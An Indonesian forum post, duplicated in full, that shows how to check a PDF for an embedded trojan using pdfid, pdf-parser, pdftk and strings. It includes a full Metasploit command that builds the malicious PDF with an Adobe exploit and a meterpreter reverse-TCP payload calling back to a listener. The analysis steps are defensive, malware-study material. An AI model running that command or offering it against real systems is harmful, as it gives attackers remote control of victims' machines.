02-05-2014, 07:31 PM
Introduction !!!
Pada kesempatan ini saya akan menulis beberapa tahapan bagaimana menganalisa file dokumen *.PDF untuk menentukan Apakah dokumen tersebut berbahaya atau tidak.
Hal ini terjadi beberapa waktu lalu ketika saya mencoba untuk men-download sebuah e-book dan kemudian file tersebut terdeteksi oleh anti-virus yang saya gunakan. ini membuat saya menjadi curiga dan kemudian saya mencoba untuk menganalisa dokumen tersebut.
berikut beberapa langkah yang saya lakukan untuk menganalisis.
Saya akan melakukan perbandingan antara dokumen PDF yang bersih dengan dokumen yg di bungkus oleh trojan
Equipment :
1. pdfid
2. pdf-parser
3. pdftk. 'apt-get install pdftk'
4. strings
press thanks button
[hide]
pada tahap pertama saya akan menganalisa dokumen "analysis.pdf" yang tidak disisipi oleh trojan.
OK, now let's go it!
langkah pertamana untuk menampilkan value yang ada serta bahasa pendukung yang di munculkan dari dokumen diatas
terlihat dari output yang ditampilkan kita hanya perlu memperhatikan baris JS / Java Script. diatas menunjukkan bahwa dokumen tersebut bebas dari adanya penyisipan trojan. terbukti nilai yang ditampilkan pada baris JS / Java Script adalah "0" berarti tidak ada text atau perintah dengan menggunakan script java.
jadi, itu berarti kita tidak perlu menganalisis lebih lanjut
maka mari kita coba untuk menganalisa dokumen yang berisi trojan, dan di sini saya menggunakan metasploit untuk memanipulasi trojan menjadi dokumen pdf
selanjutnya mendownload file tersebut.
pada gambar diatas terlihat versi yang di gunakan metasploit untuk membuat file *.pdf adalah versi 1.5.
selanjutnya melakukan hal yang sama pada tahap sebelumnya menggunakan perintah "pdfid"
terlihat pada baris JS/JavaScript memiliki value "1" yang berarti dalam dokumen tersebut terdapat perintah atau text menggunakan JavaScript.
selanjutnya menggunakan perintah "strings" untuk melihat JavaScript dalam bentuk text.
output pada gambar diatas terlihat tidak adanya JavaScript yang muncul dalam bentuk teks, ini mungkin merupakan upaya metasploit untuk mengenkripsi text java tersebut agar tidak mudah di temukan, hmm i like metasploit
next, parse the PDF document
perintah diatas juga tidak bisa menemukan adanya baris Java Script. metasploit benar2 mengenkripsikan code tersebut upaya mempersulit analysis. salut deh buat metasploit >_<
tidak hanya sampai disini, berikut cara terakhir yang saya gunakan.
Di sini saya akan membuat duplikate dokumen dan menghapus semua pengkodean dokumen "trojanPDF.pdf" dan menyalinnya ke dokumen baru dengan nama "trojanPDF-2.pdf"
setelah duplicate berhasil kita buat, kemudian gunakan perintah "strings" untuk menampilkan tampilan dokumen yg akan kita cetak.
yuhuuu, berhasil
text java script berhasil muncul dan jelas terlihat bahwa dokumen diatas memiliki infeksi trojan -_-"
# saran = hati-hati kalau mau download e-book apalagi dari sumber yang tidak jelas
source
[/hide]
Regards IBTeam
Moved to:
/ Attacker Zone / Malware - Malicious Software v / Share - Analysis PDF file contains a trojan
by
iKONs
Pada kesempatan ini saya akan menulis beberapa tahapan bagaimana menganalisa file dokumen *.PDF untuk menentukan Apakah dokumen tersebut berbahaya atau tidak.
Hal ini terjadi beberapa waktu lalu ketika saya mencoba untuk men-download sebuah e-book dan kemudian file tersebut terdeteksi oleh anti-virus yang saya gunakan. ini membuat saya menjadi curiga dan kemudian saya mencoba untuk menganalisa dokumen tersebut.
berikut beberapa langkah yang saya lakukan untuk menganalisis.
Saya akan melakukan perbandingan antara dokumen PDF yang bersih dengan dokumen yg di bungkus oleh trojan
Equipment :
1. pdfid
2. pdf-parser
3. pdftk. 'apt-get install pdftk'
4. strings
press thanks button
[hide]
pada tahap pertama saya akan menganalisa dokumen "analysis.pdf" yang tidak disisipi oleh trojan.
Spoiler! :
OK, now let's go it!
langkah pertamana untuk menampilkan value yang ada serta bahasa pendukung yang di munculkan dari dokumen diatas
Code:
# pdfid analysis.pdf
Spoiler! :
terlihat dari output yang ditampilkan kita hanya perlu memperhatikan baris JS / Java Script. diatas menunjukkan bahwa dokumen tersebut bebas dari adanya penyisipan trojan. terbukti nilai yang ditampilkan pada baris JS / Java Script adalah "0" berarti tidak ada text atau perintah dengan menggunakan script java.
jadi, itu berarti kita tidak perlu menganalisis lebih lanjut
maka mari kita coba untuk menganalisa dokumen yang berisi trojan, dan di sini saya menggunakan metasploit untuk memanipulasi trojan menjadi dokumen pdf
Code:
# msfcli exploit/windows/browser/adobe_media_newplayer PAYLOAD=windows/meterpreter/reverse_tcp SRVHOST=192.168.1.3 SRVPORT=4455 URIPATH=/ LHOST=192.168.1.3 LPORT=4444 E
Spoiler! :
selanjutnya mendownload file tersebut.
Spoiler! :
pada gambar diatas terlihat versi yang di gunakan metasploit untuk membuat file *.pdf adalah versi 1.5.
selanjutnya melakukan hal yang sama pada tahap sebelumnya menggunakan perintah "pdfid"
Code:
# pdfid trojanPDF.pdf
Spoiler! :
terlihat pada baris JS/JavaScript memiliki value "1" yang berarti dalam dokumen tersebut terdapat perintah atau text menggunakan JavaScript.
selanjutnya menggunakan perintah "strings" untuk melihat JavaScript dalam bentuk text.
Code:
# strings trojanPDF.pdf
Spoiler! :
output pada gambar diatas terlihat tidak adanya JavaScript yang muncul dalam bentuk teks, ini mungkin merupakan upaya metasploit untuk mengenkripsi text java tersebut agar tidak mudah di temukan, hmm i like metasploit
next, parse the PDF document
Code:
# pdf-parser -f trojanPDF.pdf
Spoiler! :
perintah diatas juga tidak bisa menemukan adanya baris Java Script. metasploit benar2 mengenkripsikan code tersebut upaya mempersulit analysis. salut deh buat metasploit >_<
tidak hanya sampai disini, berikut cara terakhir yang saya gunakan.
Di sini saya akan membuat duplikate dokumen dan menghapus semua pengkodean dokumen "trojanPDF.pdf" dan menyalinnya ke dokumen baru dengan nama "trojanPDF-2.pdf"
Code:
# pdftk trojanPDF.pdf output trojanPDF-2.pdf uncompress
Spoiler! :
setelah duplicate berhasil kita buat, kemudian gunakan perintah "strings" untuk menampilkan tampilan dokumen yg akan kita cetak.
Code:
# strings trojanPDF-2.pdf
Spoiler! :
yuhuuu, berhasil
text java script berhasil muncul dan jelas terlihat bahwa dokumen diatas memiliki infeksi trojan -_-"
# saran = hati-hati kalau mau download e-book apalagi dari sumber yang tidak jelas
source
[/hide]
Regards IBTeam
Moved to:
/ Attacker Zone / Malware - Malicious Software v / Share - Analysis PDF file contains a trojan
by
iKONs
Code:
Username : [ Hidemichi-Hiroyuki]
Password : [ ******** ]